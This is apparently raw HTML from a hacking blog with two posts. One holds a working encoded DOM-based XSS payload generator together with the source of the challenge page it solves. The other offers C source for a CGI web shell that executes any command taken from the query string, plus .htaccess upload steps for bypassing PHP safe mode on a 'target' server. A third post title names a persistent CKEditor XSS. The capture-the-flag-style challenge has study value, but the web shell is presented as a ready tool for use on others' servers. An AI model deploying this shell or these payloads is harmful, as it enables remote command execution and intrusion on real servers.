<br />
<table border="0" cellpadding="4" cellspacing="1" class="tborder" id="post_" style="border-top-width: 0;"><tbody>
<tr><td class="trow2 post_content "><div class="post_body" id="pid_">
<div class="codeblock phpcodeblock">
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #7ac07c;"><</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br /><br /><br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">));<br /> }<br /><br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">);<br /> for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) {<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) +</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">))<br /> }<br /> return </span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }</span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">prototype</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">toCharCode </span><span style="color: #7ac07c;">= function(){<br /> var </span><span style="color: #66ccff;">str </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">this</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">split</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">), </span><span style="color: #66ccff;">len </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">work </span><span style="color: #7ac07c;">= new Array(</span><span style="color: #66ccff;">len</span><span style="color: #7ac07c;">);<br /> for (var </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">len</span><span style="color: #7ac07c;">; ++</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">){<br /> </span><span style="color: #66ccff;">work</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">] = </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]);<br /> }<br /> return </span><span style="color: #66ccff;">work</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">join</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">','</span><span style="color: #7ac07c;">);<br /> }<br /><br /><br /> var </span><span style="color: #66ccff;">text </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">prompt</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"Enter text to alert"</span><span style="color: #7ac07c;">);<br /> var </span><span style="color: #66ccff;">input </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">"alert('" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">text </span><span style="color: #7ac07c;">+ </span><span style="color: #ff99ff;">"')"<br /> </span><span style="color: #7ac07c;">var </span><span style="color: #66ccff;">vector</span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">((</span><span style="color: #ff99ff;">"<img src=a onerror=eval(String.fromCharCode(" </span><span style="color: #7ac07c;">+ </span><span style="color: #66ccff;">input</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">toCharCode</span><span style="color: #7ac07c;">() + </span><span style="color: #ff99ff;">"))>"</span><span style="color: #7ac07c;">)) + </span><span style="color: #ff99ff;">"!!!!!!!"</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">alert</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">vector</span><span style="color: #7ac07c;">);</span><span style="color: #66ccff;"></script></span> </span></code></div>
</div>
</div>
</div>
<div class="post_meta" id="post_meta_">
</div>
</td>
</tr>
<tr>
<td class="trow1 post_buttons "><br /></td></tr>
</tbody></table>
<br />
<br />
<b><span style="font-family: Verdana,sans-serif;"><span style="font-size: small;"><span style="background-color: white;"><code>And here is the original source code in case the site ever goes down:</code></span></span></span></b><br />
<span style="background-color: white;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: white;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"><br /></span></code></span>
<span style="background-color: #444444;"><code><span style="color: #7ac07c;"> </span></code></span><code><span style="background-color: #444444;"><span style="color: #7ac07c;"><!</span><span style="color: #66ccff;">DOCTYPE html</span><span style="color: #7ac07c;">><br /><</span><span style="color: #66ccff;">html</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">title</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">JavaScript Analysis </span><span style="color: #7ac07c;">and </span><span style="color: #66ccff;">DOM</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">based XSS Challenge</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">title</span><span style="color: #7ac07c;">><br /><br /> <</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">style type</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">"text/css"</span><span style="color: #7ac07c;">><br /> </span><span style="color: #ffcccc;">#hello {<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">family</span><span style="color: #7ac07c;">:</span><span style="color: #66ccff;">monospace</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">size</span><span style="color: #7ac07c;">:</span><span style="color: #66ccff;">30px</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#FFFFFF;<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #ffcccc;">#one {<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">family</span><span style="color: #7ac07c;">:</span><span style="color: #66ccff;">monospace</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">font</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">italic</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#FFFFFF;<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #66ccff;">body </span><span style="color: #7ac07c;">{<br /> </span><span style="color: #66ccff;">background</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">color</span><span style="color: #7ac07c;">: </span><span style="color: #ffcccc;">#000000;<br /> </span><span style="color: #7ac07c;">}<br /> </</span><span style="color: #66ccff;">head</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">style</span><span style="color: #7ac07c;">><br /><br /> <</span><span style="color: #66ccff;">body</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">center</span><span style="color: #7ac07c;">><</span><span style="color: #66ccff;">b</span><span style="color: #7ac07c;">><</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">> </span><span style="color: #66ccff;">DOM</span><span style="color: #7ac07c;">-</span><span style="color: #66ccff;">based XSS Challenge with JS Analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">></</span><span style="color: #66ccff;">b</span><span style="color: #7ac07c;">><br /><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'one'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">One does not simply finds a DOM based XSS without js analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">img src</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'considered.png' </span><span style="color: #66ccff;">width</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'350px' </span><span style="color: #66ccff;">height</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'300px'</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">br</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">p id</span><span style="color: #7ac07c;">=</span><span style="color: #ff99ff;">'one'</span><span style="color: #7ac07c;">></span><span style="color: #66ccff;">One does not simply finds a DOM based XSS without js analysis</span><span style="color: #7ac07c;"></</span><span style="color: #66ccff;">p</span><span style="color: #7ac07c;">><br /> </</span><span style="color: #66ccff;">center</span><span style="color: #7ac07c;">><br /> <</span><span style="color: #66ccff;">script</span><span style="color: #7ac07c;">><br /> function </span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">parseInt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">charCodeAt</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">));<br /> }<br /><br /> function </span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> return </span><span style="color: #66ccff;">String</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">fromCharCode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> </span><span style="color: #ffcccc;">/*<br /><br /> function hmm()<br /> {<br /><br /> var append = '';<br /> for(i=0; i<=5;i++)<br /> {<br /> append += chr(Math.floor((Math.random()*58)+65));<br /> }<br /> return append;<br /> }<br /> function simple_encode(data)<br /> {<br /> hmm();<br /> var encoded = '';<br /> for(i=0; i<data.length;i++)<br /> {<br /> <br /> encoded +=(chr(ascii(data[i]) + 1));<br /> <br /> }<br /> encoded += hmm();<br /> return encoded;<br /> }<br /><br />For Hints Ask: @prakharprasad, @rafaybaloch<br />Submit your vector: http://goo.gl/VlzWR<br /><br />Special Thanks to Rafay Baloch, Maxone, Dhaval and Amol Naik<br /><br />*/<br /><br /> </span><span style="color: #7ac07c;">function </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> var </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">''</span><span style="color: #7ac07c;">;<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">6</span><span style="color: #7ac07c;">);<br /> for (</span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++) {<br /> </span><span style="color: #66ccff;">decoded </span><span style="color: #7ac07c;">+= (</span><span style="color: #66ccff;">chr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">ascii</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">]) - </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">))<br /> }<br /> return </span><span style="color: #66ccff;">decoded</span><span style="color: #7ac07c;">;<br /> }<br /><br /><br /> function </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">) {<br /> </span><span style="color: #66ccff;">data </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= (</span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'bmfsu)itSvMl'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'qspnqu)eUbfjz'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1 </span><span style="color: #7ac07c;">|| </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">indexOf</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">simple_decode</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'dpogjsn)ptBfCe'</span><span style="color: #7ac07c;">)) > -</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">);<br /> return (</span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">? </span><span style="color: #66ccff;">null </span><span style="color: #7ac07c;">: </span><span style="color: #66ccff;">data</span><span style="color: #7ac07c;">);<br /> }<br /><br /> function </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">)<br /><br /> {<br /> return </span><span style="color: #66ccff;">unescape</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length</span><span style="color: #7ac07c;">));<br /> }<br /><br /> if (</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">) {<br /><br /> </span><span style="color: #66ccff;">taint </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">validate</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">));<br /> </span><span style="color: #66ccff;">cond </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getData</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">location</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">hash</span><span style="color: #7ac07c;">);<br /><br /> if (</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">substr</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">cond</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">length </span><span style="color: #7ac07c;">- </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">) == </span><span style="color: #ff99ff;">'!'</span><span style="color: #7ac07c;">) {<br /><br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">taint</span><span style="color: #7ac07c;">;<br /><br /> }<br /> } else {<br /> </span><span style="color: #66ccff;">document</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">getElementById</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">'hello'</span><span style="color: #7ac07c;">).</span><span style="color: #66ccff;">innerHTML </span><span style="color: #7ac07c;">+= </span><span style="color: #ff99ff;">'<br> Try to find a valid XSS vector, after reviewing the code :)'<br /> </span><span style="color: #7ac07c;">}<br /> </span><span style="color: #66ccff;"></script></span> </body><br /><br /></html> </span></code><br />
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-2945724326682335122013-05-18T20:57:00.002-07:002014-06-09T15:19:05.919-07:00CGI-C Shell - PHP disabled functions/Safe Mode Bypass Shell source [Windows/Linux]<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/ONG0Ns1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/ONG0Ns1.jpg" height="218" width="640" /></a></div>
<br />
When Safe mode is on it can be a pain to do what you want to do on the system. Being able to access CGI solves this problem, and here is my implementation of a shell (safe mode bypass) in C for windows and linux.<br />
<br />
<a name='more'></a><br />
// (If you find this useful, why not checkout a advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/s0FTuyY.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/s0FTuyY.jpg" height="366" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/suYX4SN.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/V5NU7fS.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/V5NU7fS.jpg" height="218" width="640" /></a></div>
<br />
<h4>
<u><b>The code:</b></u></h4>
<span style="background-color: black;"><br /></span>
<span style="background-color: black;"><br /></span>
<code><span style="background-color: black;"><span style="color: #ffcccc;">#include <stdio.h><br />#include <string.h><br />#include <stdlib.h><br />#include <ctype.h><br /><br /><br />//CGI-C Shell - Safe mode bypass ~ r0ng ~ hackers2devnull.blogspot.co.uk<br />//Upload a .htaccess file with:<br />// Options +ExecCGI<br />// AddHandler cgi-script cgi<br />//Then usage is target.com/shell.cgi?[command]<br />//Compatible with Windows and linux</span><span style="color: #66ccff;"> </span></span></code><br />
<br />
<code><span style="background-color: black;"><span style="color: #66ccff;">int main</span><span style="color: #7ac07c;">( </span><span style="color: #66ccff;">void </span><span style="color: #7ac07c;">)<br /><br />{<br /><br /> </span><span style="color: #66ccff;">char </span><span style="color: #7ac07c;">*</span><span style="color: #66ccff;">env </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">getenv</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"QUERY_STRING"</span><span style="color: #7ac07c;">);<br /><br /><br /> </span><span style="color: #66ccff;">char pStream</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">128</span><span style="color: #7ac07c;">];<br /><br /><br /> </span><span style="color: #66ccff;">FILE </span><span style="color: #7ac07c;">*</span><span style="color: #66ccff;">pPipe</span><span style="color: #7ac07c;">;<br /><br /><br /> </span><span style="color: #66ccff;">urlStrip</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">env</span><span style="color: #7ac07c;">);<br /><br /> </span><span style="color: #66ccff;">printf</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"Content-type: text/html\n\n\n"</span><span style="color: #7ac07c;">);<br /><br /><br /><br /> </span><span style="color: #ffcccc;">#if defined (WIN32) || defined (_WIN32) || defined (__WIN32__) || defined (__NT__) || defined (WIN64) || defined (_WIN64) || defined (__WIN64__)<br /><br /><br /> </span><span style="color: #66ccff;">pPipe </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">_popen</span><span style="color: #7ac07c;">( </span><span style="color: #66ccff;">env</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"r" </span><span style="color: #7ac07c;">);<br /><br /><br /> </span><span style="color: #ffcccc;">#else<br /><br /><br /> </span><span style="color: #66ccff;">pPipe </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">popen</span><span style="color: #7ac07c;">( </span><span style="color: #66ccff;">env</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"r" </span><span style="color: #7ac07c;">);<br /><br /><br /> </span><span style="color: #ffcccc;">#endif<br /><br /><br /><br /> </span><span style="color: #7ac07c;">while( !</span><span style="color: #66ccff;">feof</span><span style="color: #7ac07c;">( </span><span style="color: #66ccff;">pPipe </span><span style="color: #7ac07c;">) )<br /><br /><br /> {<br /> <br /> if( </span><span style="color: #66ccff;">fgets</span><span style="color: #7ac07c;">( </span><span style="color: #66ccff;">pStream</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">128</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">pPipe </span><span style="color: #7ac07c;">) != </span><span style="color: #66ccff;">NULL </span><span style="color: #7ac07c;">)<br /><br /> </span><span style="color: #66ccff;">printf</span><span style="color: #7ac07c;">( </span><span style="color: #ff99ff;">"<pre>%s"</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">pStream </span><span style="color: #7ac07c;">);<br /> <br /> }<br /><br /><br />}</span><span style="color: #66ccff;">int urlStrip</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">char </span><span style="color: #7ac07c;">*</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">)<br /><br />{<br /><br /> </span><span style="color: #66ccff;">unsigned int i</span><span style="color: #7ac07c;">;<br /><br /> </span><span style="color: #66ccff;">char url</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">BUFSIZ</span><span style="color: #7ac07c;">];<br /><br /> </span><span style="color: #66ccff;">char </span><span style="color: #7ac07c;">*</span><span style="color: #66ccff;">ptr </span><span style="color: #7ac07c;">= </span><span style="color: #66ccff;">url</span><span style="color: #7ac07c;">;<br /><br /> </span><span style="color: #66ccff;">memset</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">url</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">sizeof</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">url</span><span style="color: #7ac07c;">));<br /><br /><br /><br /> for (</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">=</span><span style="color: #66ccff;">0</span><span style="color: #7ac07c;">; </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">< </span><span style="color: #66ccff;">strlen</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">); </span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">++)<br /><br /> {<br /><br /> if (</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">] != </span><span style="color: #ff99ff;">'%'</span><span style="color: #7ac07c;">)<br /><br /> {<br /><br /> *</span><span style="color: #66ccff;">ptr</span><span style="color: #7ac07c;">++ = </span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">];<br /><br /> continue;<br /><br /> }<br /><br /><br /><br /> if (!</span><span style="color: #66ccff;">isdigit</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">+</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">]) || !</span><span style="color: #66ccff;">isdigit</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">+</span><span style="color: #66ccff;">2</span><span style="color: #7ac07c;">]))<br /><br /> {<br /><br /> *</span><span style="color: #66ccff;">ptr</span><span style="color: #7ac07c;">++ = </span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">];<br /><br /> continue;<br /><br /> }<br /><br /><br /><br /> *</span><span style="color: #66ccff;">ptr</span><span style="color: #7ac07c;">++ = ((</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">+</span><span style="color: #66ccff;">1</span><span style="color: #7ac07c;">] - </span><span style="color: #ff99ff;">'0'</span><span style="color: #7ac07c;">) << </span><span style="color: #66ccff;">4</span><span style="color: #7ac07c;">) | (</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">[</span><span style="color: #66ccff;">i</span><span style="color: #7ac07c;">+</span><span style="color: #66ccff;">2</span><span style="color: #7ac07c;">] - </span><span style="color: #ff99ff;">'0'</span><span style="color: #7ac07c;">);<br /><br /> </span><span style="color: #66ccff;">i </span><span style="color: #7ac07c;">+= </span><span style="color: #66ccff;">2</span><span style="color: #7ac07c;">;<br /><br /> }<br /><br /> *</span><span style="color: #66ccff;">ptr </span><span style="color: #7ac07c;">= </span><span style="color: #ff99ff;">'\0'</span><span style="color: #7ac07c;">;<br /><br /> </span><span style="color: #66ccff;">strcpy</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">str</span><span style="color: #7ac07c;">, </span><span style="color: #66ccff;">url</span><span style="color: #7ac07c;">);<br /><br /> return </span><span style="color: #66ccff;">0</span></span><span style="color: #7ac07c;"><span style="background-color: black;">;} </span></span></code>
<br />
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-5542675462057504";
/* hackers2devnull_main_Blog1_300x250_as */
google_ad_slot = "9084022275";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script src="//pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2511450483904536606.post-25566361512009932662013-05-15T04:17:00.000-07:002015-06-13T16:44:46.320-07:00Persistent XSS in wysiwyg module CKEditor below 4.1 - drupal 6.x 7.x<br />
<div class="separator" style="clear: both; text-align: center;">
